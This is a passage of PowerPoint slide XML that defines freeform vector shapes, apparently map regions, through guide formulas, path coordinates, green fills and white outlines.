                  <a:gd name="T41" fmla="*/ 51 h 68"/>
                  <a:gd name="T42" fmla="*/ 14 w 59"/>
                  <a:gd name="T43" fmla="*/ 51 h 68"/>
                  <a:gd name="T44" fmla="*/ 10 w 59"/>
                  <a:gd name="T45" fmla="*/ 53 h 68"/>
                  <a:gd name="T46" fmla="*/ 4 w 59"/>
                  <a:gd name="T47" fmla="*/ 52 h 68"/>
                  <a:gd name="T48" fmla="*/ 0 w 59"/>
                  <a:gd name="T49" fmla="*/ 47 h 68"/>
                  <a:gd name="T50" fmla="*/ 12 w 59"/>
                  <a:gd name="T51" fmla="*/ 34 h 68"/>
                  <a:gd name="T52" fmla="*/ 18 w 59"/>
                  <a:gd name="T53" fmla="*/ 16 h 68"/>
                  <a:gd name="T54" fmla="*/ 24 w 59"/>
                  <a:gd name="T55" fmla="*/ 14 h 68"/>
                  <a:gd name="T56" fmla="*/ 27 w 59"/>
                  <a:gd name="T57" fmla="*/ 20 h 68"/>
                  <a:gd name="T58" fmla="*/ 23 w 59"/>
                  <a:gd name="T59" fmla="*/ 22 h 68"/>
                  <a:gd name="T60" fmla="*/ 23 w 59"/>
                  <a:gd name="T61" fmla="*/ 29 h 68"/>
                  <a:gd name="T62" fmla="*/ 32 w 59"/>
                  <a:gd name="T63" fmla="*/ 29 h 68"/>
                  <a:gd name="T64" fmla="*/ 36 w 59"/>
                  <a:gd name="T65" fmla="*/ 23 h 68"/>
                  <a:gd name="T66" fmla="*/ 32 w 59"/>
                  <a:gd name="T67" fmla="*/ 21 h 68"/>
                  <a:gd name="T68" fmla="*/ 34 w 59"/>
                  <a:gd name="T69" fmla="*/ 17 h 68"/>
                  <a:gd name="T70" fmla="*/ 29 w 59"/>
                  <a:gd name="T71" fmla="*/ 16 h 68"/>
                  <a:gd name="T72" fmla="*/ 29 w 59"/>
                  <a:gd name="T73" fmla="*/ 10 h 68"/>
                  <a:gd name="T74" fmla="*/ 30 w 59"/>
                  <a:gd name="T75" fmla="*/ 6 h 68"/>
                  <a:gd name="T76" fmla="*/ 39 w 59"/>
                  <a:gd name="T77" fmla="*/ 1 h 68"/>
                  <a:gd name="T78" fmla="*/ 51 w 59"/>
                  <a:gd name="T79" fmla="*/ 0 h 68"/>
                  <a:gd name="T80" fmla="*/ 55 w 59"/>
                  <a:gd name="T81" fmla="*/ 4 h 68"/>
                  <a:gd name="T82" fmla="*/ 58 w 59"/>
                  <a:gd name="T83" fmla="*/ 6 h 68"/>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59"/>
                  <a:gd name="T127" fmla="*/ 0 h 68"/>
                  <a:gd name="T128" fmla="*/ 59 w 59"/>
                  <a:gd name="T129" fmla="*/ 68 h 68"/>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59" h="68">
                    <a:moveTo>
                      <a:pt x="58" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36141" name="Freeform 274"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2795" y="1940"/>
                <a:ext cx="59" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 59 w 59"/>
                  <a:gd name="T1" fmla="*/ 11 h 68"/>
                  <a:gd name="T2" fmla="*/ 56 w 59"/>
                  <a:gd name="T3" fmla="*/ 20 h 68"/>
                  <a:gd name="T4" fmla="*/ 51 w 59"/>
                  <a:gd name="T5" fmla="*/ 22 h 68"/>
                  <a:gd name="T6" fmla="*/ 54 w 59"/>
                  <a:gd name="T7" fmla="*/ 25 h 68"/>
                  <a:gd name="T8" fmla="*/ 56 w 59"/>
                  <a:gd name="T9" fmla="*/ 27 h 68"/>
                  <a:gd name="T10" fmla="*/ 53 w 59"/>
                  <a:gd name="T11" fmla="*/ 33 h 68"/>
                  <a:gd name="T12" fmla="*/ 50 w 59"/>
                  <a:gd name="T13" fmla="*/ 39 h 68"/>
                  <a:gd name="T14" fmla="*/ 43 w 59"/>
                  <a:gd name="T15" fmla="*/ 39 h 68"/>
                  <a:gd name="T16" fmla="*/ 39 w 59"/>
                  <a:gd name="T17" fmla="*/ 41 h 68"/>
                  <a:gd name="T18" fmla="*/ 41 w 59"/>
                  <a:gd name="T19" fmla="*/ 45 h 68"/>
                  <a:gd name="T20" fmla="*/ 43 w 59"/>
                  <a:gd name="T21" fmla="*/ 52 h 68"/>
                  <a:gd name="T22" fmla="*/ 41 w 59"/>
                  <a:gd name="T23" fmla="*/ 57 h 68"/>
                  <a:gd name="T24" fmla="*/ 40 w 59"/>
                  <a:gd name="T25" fmla="*/ 59 h 68"/>
                  <a:gd name="T26" fmla="*/ 38 w 59"/>
                  <a:gd name="T27" fmla="*/ 62 h 68"/>
                  <a:gd name="T28" fmla="*/ 40 w 59"/>
                  <a:gd name="T29" fmla="*/ 65 h 68"/>
                  <a:gd name="T30" fmla="*/ 34 w 59"/>
                  <a:gd name="T31" fmla="*/ 68 h 68"/>
                  <a:gd name="T32" fmla="*/ 36 w 59"/>
                  <a:gd name="T33" fmla="*/ 63 h 68"/>
                  <a:gd name="T34" fmla="*/ 31 w 59"/>
                  <a:gd name="T35" fmla="*/ 54 h 68"/>
                  <a:gd name="T36" fmla="*/ 25 w 59"/>
                  <a:gd name="T37" fmla="*/ 51 h 68"/>
                  <a:gd name="T38" fmla="*/ 22 w 59"/>
                  <a:gd name="T39" fmla="*/ 52 h 68"/>
                  <a:gd name="T40" fmla="*/ 18 w 59"/>
                  <a:gd name="T41" fmla="*/ 51 h 68"/>
                  <a:gd name="T42" fmla="*/ 14 w 59"/>
                  <a:gd name="T43" fmla="*/ 51 h 68"/>
                  <a:gd name="T44" fmla="*/ 10 w 59"/>
                  <a:gd name="T45" fmla="*/ 53 h 68"/>
                  <a:gd name="T46" fmla="*/ 4 w 59"/>
                  <a:gd name="T47" fmla="*/ 52 h 68"/>
                  <a:gd name="T48" fmla="*/ 0 w 59"/>
                  <a:gd name="T49" fmla="*/ 47 h 68"/>
                  <a:gd name="T50" fmla="*/ 12 w 59"/>
                  <a:gd name="T51" fmla="*/ 34 h 68"/>
                  <a:gd name="T52" fmla="*/ 18 w 59"/>
                  <a:gd name="T53" fmla="*/ 16 h 68"/>
                  <a:gd name="T54" fmla="*/ 24 w 59"/>
                  <a:gd name="T55" fmla="*/ 14 h 68"/>
                  <a:gd name="T56" fmla="*/ 27 w 59"/>
                  <a:gd name="T57" fmla="*/ 20 h 68"/>
                  <a:gd name="T58" fmla="*/ 23 w 59"/>
                  <a:gd name="T59" fmla="*/ 22 h 68"/>
                  <a:gd name="T60" fmla="*/ 23 w 59"/>
                  <a:gd name="T61" fmla="*/ 29 h 68"/>
                  <a:gd name="T62" fmla="*/ 32 w 59"/>
                  <a:gd name="T63" fmla="*/ 29 h 68"/>
                  <a:gd name="T64" fmla="*/ 36 w 59"/>
                  <a:gd name="T65" fmla="*/ 23 h 68"/>
                  <a:gd name="T66" fmla="*/ 32 w 59"/>
                  <a:gd name="T67" fmla="*/ 21 h 68"/>
                  <a:gd name="T68" fmla="*/ 34 w 59"/>
                  <a:gd name="T69" fmla="*/ 17 h 68"/>
                  <a:gd name="T70" fmla="*/ 29 w 59"/>
                  <a:gd name="T71" fmla="*/ 16 h 68"/>
                  <a:gd name="T72" fmla="*/ 29 w 59"/>
                  <a:gd name="T73" fmla="*/ 10 h 68"/>
                  <a:gd name="T74" fmla="*/ 30 w 59"/>
                  <a:gd name="T75" fmla="*/ 6 h 68"/>
                  <a:gd name="T76" fmla="*/ 39 w 59"/>
                  <a:gd name="T77" fmla="*/ 1 h 68"/>
                  <a:gd name="T78" fmla="*/ 51 w 59"/>
                  <a:gd name="T79" fmla="*/ 0 h 68"/>
                  <a:gd name="T80" fmla="*/ 55 w 59"/>
                  <a:gd name="T81" fmla="*/ 4 h 68"/>
                  <a:gd name="T82" fmla="*/ 58 w 59"/>
                  <a:gd name="T83" fmla="*/ 6 h 68"/>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59"/>
                  <a:gd name="T127" fmla="*/ 0 h 68"/>
                  <a:gd name="T128" fmla="*/ 59 w 59"/>
                  <a:gd name="T129" fmla="*/ 68 h 68"/>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59" h="68">
                    <a:moveTo>
                      <a:pt x="58" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="6"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36142" name="Freeform 275"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2588" y="2207"/>
                <a:ext cx="54" cy="105"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 54"/>
                  <a:gd name="T1" fmla="*/ 102 h 105"/>
                  <a:gd name="T2" fmla="*/ 24 w 54"/>
                  <a:gd name="T3" fmla="*/ 105 h 105"/>
                  <a:gd name="T4" fmla="*/ 16 w 54"/>
                  <a:gd name="T5" fmla="*/ 103 h 105"/>
                  <a:gd name="T6" fmla="*/ 9 w 54"/>
                  <a:gd name="T7" fmla="*/ 105 h 105"/>
                  <a:gd name="T8" fmla="*/ 11 w 54"/>
                  <a:gd name="T9" fmla="*/ 95 h 105"/>
                  <a:gd name="T10" fmla="*/ 9 w 54"/>
                  <a:gd name="T11" fmla="*/ 86 h 105"/>
                  <a:gd name="T12" fmla="*/ 11 w 54"/>
                  <a:gd name="T13" fmla="*/ 77 h 105"/>
                  <a:gd name="T14" fmla="*/ 11 w 54"/>
                  <a:gd name="T15" fmla="*/ 75 h 105"/>
                  <a:gd name="T16" fmla="*/ 5 w 54"/>
                  <a:gd name="T17" fmla="*/ 77 h 105"/>
                  <a:gd name="T18" fmla="*/ 7 w 54"/>
                  <a:gd name="T19" fmla="*/ 72 h 105"/>
                  <a:gd name="T20" fmla="*/ 9 w 54"/>
                  <a:gd name="T21" fmla="*/ 69 h 105"/>
                  <a:gd name="T22" fmla="*/ 6 w 54"/>
                  <a:gd name="T23" fmla="*/ 70 h 105"/>
                  <a:gd name="T24" fmla="*/ 0 w 54"/>
                  <a:gd name="T25" fmla="*/ 71 h 105"/>
                  <a:gd name="T26" fmla="*/ 1 w 54"/>
                  <a:gd name="T27" fmla="*/ 66 h 105"/>
                  <a:gd name="T28" fmla="*/ 2 w 54"/>
                  <a:gd name="T29" fmla="*/ 57 h 105"/>
                  <a:gd name="T30" fmla="*/ 6 w 54"/>
                  <a:gd name="T31" fmla="*/ 52 h 105"/>
                  <a:gd name="T32" fmla="*/ 9 w 54"/>
                  <a:gd name="T33" fmla="*/ 40 h 105"/>
                  <a:gd name="T34" fmla="*/ 11 w 54"/>
                  <a:gd name="T35" fmla="*/ 15 h 105"/>
                  <a:gd name="T36" fmla="*/ 10 w 54"/>
                  <a:gd name="T37" fmla="*/ 7 h 105"/>
                  <a:gd name="T38" fmla="*/ 18 w 54"/>
                  <a:gd name="T39" fmla="*/ 2 h 105"/>
                  <a:gd name="T40" fmla="*/ 25 w 54"/>
                  <a:gd name="T41" fmla="*/ 5 h 105"/>
                  <a:gd name="T42" fmla="*/ 42 w 54"/>
                  <a:gd name="T43" fmla="*/ 3 h 105"/>
                  <a:gd name="T44" fmla="*/ 47 w 54"/>
                  <a:gd name="T45" fmla="*/ 5 h 105"/>
                  <a:gd name="T46" fmla="*/ 54 w 54"/>
                  <a:gd name="T47" fmla="*/ 12 h 105"/>
                  <a:gd name="T48" fmla="*/ 52 w 54"/>
                  <a:gd name="T49" fmla="*/ 17 h 105"/>
                  <a:gd name="T50" fmla="*/ 43 w 54"/>
                  <a:gd name="T51" fmla="*/ 22 h 105"/>
                  <a:gd name="T52" fmla="*/ 43 w 54"/>
                  <a:gd name="T53" fmla="*/ 31 h 105"/>
                  <a:gd name="T54" fmla="*/ 42 w 54"/>
                  <a:gd name="T55" fmla="*/ 49 h 105"/>
                  <a:gd name="T56" fmla="*/ 39 w 54"/>
                  <a:gd name="T57" fmla="*/ 53 h 105"/>
                  <a:gd name="T58" fmla="*/ 33 w 54"/>
                  <a:gd name="T59" fmla="*/ 54 h 105"/>
                  <a:gd name="T60" fmla="*/ 40 w 54"/>
                  <a:gd name="T61" fmla="*/ 64 h 105"/>
                  <a:gd name="T62" fmla="*/ 39 w 54"/>
                  <a:gd name="T63" fmla="*/ 69 h 105"/>
                  <a:gd name="T64" fmla="*/ 34 w 54"/>
                  <a:gd name="T65" fmla="*/ 79 h 105"/>
                  <a:gd name="T66" fmla="*/ 42 w 54"/>
                  <a:gd name="T67" fmla="*/ 83 h 105"/>
                  <a:gd name="T68" fmla="*/ 34 w 54"/>
                  <a:gd name="T69" fmla="*/ 92 h 105"/>
                  <a:gd name="T70" fmla="*/ 32 w 54"/>
                  <a:gd name="T71" fmla="*/ 101 h 105"/>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54"/>
                  <a:gd name="T109" fmla="*/ 0 h 105"/>
                  <a:gd name="T110" fmla="*/ 54 w 54"/>
                  <a:gd name="T111" fmla="*/ 105 h 105"/>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54" h="105">
                    <a:moveTo>
                      <a:pt x="32" y="101"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="30" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="24"/>
                    </a:lnTo>
